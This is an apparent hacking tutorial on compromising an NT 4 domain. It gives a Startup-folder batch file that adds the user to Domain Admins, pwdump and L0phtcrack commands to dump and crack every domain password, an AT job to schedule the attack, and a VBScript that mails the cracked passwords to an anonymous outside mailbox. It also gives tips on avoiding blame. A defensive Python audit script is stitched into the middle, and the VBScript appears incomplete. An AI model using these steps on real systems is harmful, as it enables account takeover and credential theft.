Hacking an NT 4 Domain from the Desktop - Revisited

by Hi_Risc (a.k.a. ASB)

I previously showed how to gain administrative rights to both the local NT Workstation and the whole domain by simply placing the following script in the "C:\WINNT\PROFILES\ALL USERS\START MENU\PROGRAMS\STARTUP" folder and having an administrator log in:

@echo off
net user %username% password /active:yes /domain /add
net localgroup administrators %username% /add
net group "Domain Admins" %username% /add /domain
net group "Guests" %username% /delete /domain

What I propose to add to this is a complete crack of every password listed in that domain.  These passwords will be emailed to an anonymous mailbox of your choice (e.g. Hotmail, Lycos, etc.).

To do this, you will need some extensive "inside" information about the domain, namely the domain controllers.  Keep in mind that this sort of action would be considered illegal and suspicious to anyone aware of it - so don't do it, and don't tell anyone that you know how.  The reason I perform(ed) this is because you can learn a lot about people from their passwords.

To crack the passwords, you will need a couple of applications that are available for free download.  I'm sure we've all heard of L0phtcrack.  In the source distribution of L0phtcrack are some command line executables for dumping passwords from the registry and cracking them with dictionary files and/or brute force.  Specifically, we want the PWDUMP.EXE and the LC_CLI.EXE files from the source.  Optionally, there is also a PASSWD.TXT file that we can use.  It contains some common passwords and runs extremely quickly.  Generally, I use the password file - just for shits and giggles.  It can dramatically reduce the "crack" time.

Taking for granted that we have already gained domain admin rights by some manner, we can easily create a batch file for the dump and crack.  Here is what mine might look like:

@echo off
pwdump.exe \\%domaincontroller% > pword.txt
lc_cli.exe -p pword.txt -o passwd.txt -b

This dumps the password hashes from the domain controller's registry into a text file named "PWORD.TXT", then runs LC_CLI.EXE on that output using the password dictionary and brute force.

The actual crack time can take a very long time.  In many cases, it's easier to count crack time in days rather than hours.  Ideally, you would want to have a very fast machine to do the cracking.  The best crack time I can recall is approximately eight hours on nearly 200 user accounts.  This was on an exceptional server that I had access to.  Specifically, I believe it was a single 866 MHz Intel with 1 GB of RAM.

In my current position, I keep my computer running constantly because I have an unnamed distributed application running.  I would highly recommend that you automate these actions so in case the plot has been uncovered you could claim ignorance.  For example, I would schedule the dump, crack, and email to occur in sequence via a script run within the Schedule service.  A task can be added with a command similar to the following:

at \\%servername% 12:01AM /every:Sa "%path_to_batch_or_executable%"
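For the other side of the desk, here is an added audit helper (my own example, not code from the article) that flags the two footholds described above: an escalation batch file in the All Users Startup folder, and an AT job that runs a script not on an allow-list.  The startup script and the AT listing it scans are constructed samples, and the AT column layout is an assumption modelled on NT's AT output rather than captured from a real server.

```python
import re
# Commands the startup script above uses to put an account into admin groups.
ESCALATION_PATTERNS = [
    re.compile(r'\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b', re.I),
    re.compile(r'\bnet\s+group\s+"?domain admins"?\s+\S+\s+/add\b', re.I),
    re.compile(r'\bnet\s+users?\s+\S+\s+\S+.*\s/add\b', re.I),
]

def scan_startup_script(name, contents):
    """Return (file, line) pairs for lines that add an account to an admin group."""
    hits = []
    for line in contents.splitlines():
        if any(p.search(line) for p in ESCALATION_PATTERNS):
            hits.append((name, line.strip()))
    return hits

# AT listing row: [status] id, Each/Next, day(s), time, command (layout assumed, not captured).
AT_JOB = re.compile(
    r'^\s*(?:[A-Za-z]+\s+)?(\d+)\s+(Each|Next)\s+(.+?)\s+'
    r'(\d{1,2}:\d{2}\s*[AP]M)\s+(.+?)\s*$', re.I)

def unexpected_at_jobs(listing, allowed_commands):
    """Return AT jobs whose command line is not on the allow-list."""
    allowed = {c.lower() for c in allowed_commands}
    jobs = []
    for line in listing.splitlines():
        m = AT_JOB.match(line)
        if m and m.group(5).lower() not in allowed:
            jobs.append({'id': int(m.group(1)), 'command': m.group(5),
                         'when': f'{m.group(2)} {m.group(3)} {m.group(4)}'})
    return jobs

# Constructed samples: a dropped startup script and an AT listing.
STARTUP_SCRIPT = """echo off
net users %username% password /active /domain /add
net localgroup administrators %username% /add
net group "Domain Admins" %username% /add /domain
"""
AT_LISTING = r"""Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each Sa                 12:01 AM      \\SRV01\tools\dumpcrack.bat
        2   Each M T W Th F         2:00 AM       C:\WINNT\backup.cmd
"""
ALLOWED_JOBS = [r'C:\WINNT\backup.cmd']

def audit():
    """Run both checks over the constructed samples."""
    return (scan_startup_script('escalate.bat', STARTUP_SCRIPT),
            unexpected_at_jobs(AT_LISTING, ALLOWED_JOBS))
```

In practice you would feed scan_startup_script the contents of each file in the All Users Startup folder and unexpected_at_jobs the output of AT on each server.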

There is also a tool available in the NT Resource Kit called RCMD, which stands for Remote Command.  It has two parts: the client and the server service.  The client executable is "RCMD.EXE" and the server service installer is "RCMDSVC.EXE".

Generally, this would require PCAnywhere access or direct terminal access to get the service installed on the server - unless you're aware that it's already installed.  In the case that it's already installed on the server, you would place the client in the C:\WINNT\SYSTEM32 directory (or anywhere else listed in the path statement).  Open a command prompt: Start -> Run -> "CMD.EXE" for the newbies.  Once the prompt is opened, type: "RCMD %servername%".  This opens a shell on the target server and gives you full control over the executables we want to manipulate.  For the sake of safety, I would probably place the files on a network share as read-only, with some inconspicuous user as the owner, e.g. guest.

At this point, we have done all that's necessary to dump and crack the passwords.  What we want to do now is have either the encrypted passwords emailed to us immediately so that we can crack them at our leisure, or actually have the balls to use the target's resources to crack their own passwords as well as their own email system to send it out.  Again, this requires some "knowledge" of the target.  In order to email the passwords (in one form or another) we would have to be sure that the server had a configured email client.  Technically, we could have the email sent from our own desktop, but that might lend itself to incriminating us.

Many shops have the Office suite installed on their servers but may not have an email account configured.  This poses the greatest problem.  Like I said before, we should either know that the server has Outlook configured, or email from the desktop.  One thing that might save us from incrimination is the fact that this all occurs while we're not on the premises.  To do the emailing, I create a Visual Basic Script for automating the process.  I'm really just beginning the learning process myself, so I won't go into much detail regarding the mechanics, because it was largely pieced together from examples I had available to me.

This is a sample of what it might look like:

Option Explicit
Dim objOutlook, clsMessage, clsRecipient, objOutlookAttach

' Open an Outlook session
Set objOutlook = CreateObject("Outlook.Application")
Set clsMessage = objOutlook.CreateItem(0) ' Value of 0 = olMailItem

With clsMessage
    Set clsRecipient = .Recipients.Add("%InternetEmailAccount%")
    clsRecipient.Type = 1 ' Value of 1 = olTo
    .Body = "Here you go!"
    .Importance = 2 ' Value of 2 = olImportanceHigh
    Set objOutlookAttach = .Attachments.Add("\\%servername%\%sharename%\%file.txt%")

    ' Stop if the address book cannot resolve the recipient
    If Not clsRecipient.Resolve Then
        WScript.Quit 1
    End If
End With

Set clsMessage = Nothing
Set objOutlook = Nothing

Code: SendEmailMessage.vbs